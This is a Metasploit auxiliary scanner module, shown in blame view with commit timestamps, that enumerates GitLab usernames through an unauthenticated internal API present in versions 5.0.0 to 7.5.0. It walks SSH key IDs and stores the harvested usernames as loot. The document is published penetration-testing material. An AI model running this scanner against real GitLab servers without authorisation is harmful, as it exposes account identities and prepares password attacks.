metasploit-framework/modules/auxiliary/scanner/http/gitlab_user_enum.rb

151 lines
4.5 KiB
Ruby
Raw Normal View History

2014-08-17 04:39:12 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
require 'json'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
2014-12-15 17:20:23 +00:00
super(update_info(
info,
2014-08-17 04:39:12 +00:00
'Name' => 'Gitlab User Enumeration',
2014-12-15 17:20:23 +00:00
'Description' => "
2014-08-17 04:39:12 +00:00
The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This
allows the username for each SSH Key ID number to be retrieved. Users
2014-12-15 17:20:23 +00:00
who do not have an SSH Key cannot be enumerated in this fashion. LDAP
2015-03-17 10:03:32 +00:00
users, e.g. Active Directory users will also be returned. This issue
was fixed in Gitlab v7.5.0 and is present from Gitlab v5.0.0.
2014-12-15 17:20:23 +00:00
",
2014-08-17 04:39:12 +00:00
'Author' => 'Ben Campbell',
2014-12-15 17:20:23 +00:00
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 15 2014',
'References' =>
[
2014-12-15 17:44:24 +00:00
[ 'URL', 'https://labs.mwrinfosecurity.com/tools/gitlab-user-enumeration-metasploit-module' ]
2014-12-15 17:20:23 +00:00
]
))
2014-08-17 04:39:12 +00:00
register_options(
[
OptString.new('TARGETURI', [ true, 'Path to Gitlab instance', '/']),
OptInt.new('START_ID', [true, 'ID number to start from', 0]),
OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])
], self.class)
end
def run_host(_ip)
2015-03-17 10:03:32 +00:00
internal_api = '/api/v3/internal'
2014-08-17 04:39:12 +00:00
check = normalize_uri(target_uri.path, internal_api, 'check')
print_status('Sending gitlab version request...')
res = send_request_cgi(
'uri' => check
)
if res && res.code == 200 && res.body
version = JSON.parse(res.body)
git_version = version['gitlab_version']
git_revision = version['gitlab_rev']
print_good("GitLab version: #{git_version} revision: #{git_revision}")
2015-03-17 10:03:32 +00:00
service = report_service(
2014-08-17 04:39:12 +00:00
host: rhost,
port: rport,
name: (ssl ? 'https' : 'http'),
proto: 'tcp'
)
report_web_site(
host: rhost,
port: rport,
ssl: ssl,
info: "Gitlab Version - #{git_version}"
)
2014-12-15 17:44:24 +00:00
elsif res && res.code == 401
fail_with(Failure::NotVulnerable, 'Unable to retrieve Gitlab version...')
2014-12-15 18:13:22 +00:00
else
2014-12-15 17:20:23 +00:00
fail_with(Failure::Unknown, 'Unable to retrieve Gitlab version...')
end
2014-08-17 04:39:12 +00:00
discover = normalize_uri(target_uri.path, internal_api, 'discover')
2015-03-17 09:55:28 +00:00
users = ''
2014-08-17 04:39:12 +00:00
print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")
datastore['START_ID'].upto(datastore['END_ID']) do |id|
res = send_request_cgi(
'uri' => discover,
'method' => 'GET',
'vars_get' => { 'key_id' => id }
)
2014-12-15 18:13:22 +00:00
if res && res.code == 200 && res.body
2014-08-17 04:39:12 +00:00
begin
user = JSON.parse(res.body)
2015-03-17 09:55:28 +00:00
username = user['username']
unless username.nil? || username.to_s.empty?
print_good("Key-ID: #{id} Username: #{username} Name: #{user['name']}")
store_username(username, res)
users << "#{username}\n"
end
2014-08-17 04:39:12 +00:00
rescue JSON::ParserError
print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")
end
elsif res
vprint_status("Key-ID: #{id} not found")
else
print_error('Connection timed out...')
end
end
2015-03-17 09:55:28 +00:00
unless users.nil? || users.to_s.empty?
2015-03-17 10:03:32 +00:00
store_userlist(users, service)
2015-03-17 09:55:28 +00:00
end
end
2015-03-17 10:03:32 +00:00
def store_userlist(users, service)
2015-03-17 09:55:28 +00:00
loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'Gitlab Users', service)
print_good("Userlist stored at #{loot}")
2014-08-17 04:39:12 +00:00
end
2014-12-15 17:20:23 +00:00
2014-12-15 18:13:22 +00:00
def store_username(username, res)
# Should the service be 'Gitlab'?
service = ssl ? 'https' : 'http'
service_data = {
address: rhost,
port: rport,
service_name: service,
protocol: 'tcp',
workspace_id: myworkspace_id,
proof: res
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: username
}
credential_data.merge!(service_data)
# Create the Metasploit::Credential::Core object
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
# Merge in the service data and create our Login
login_data.merge!(service_data)
create_credential_login(login_data)
end
end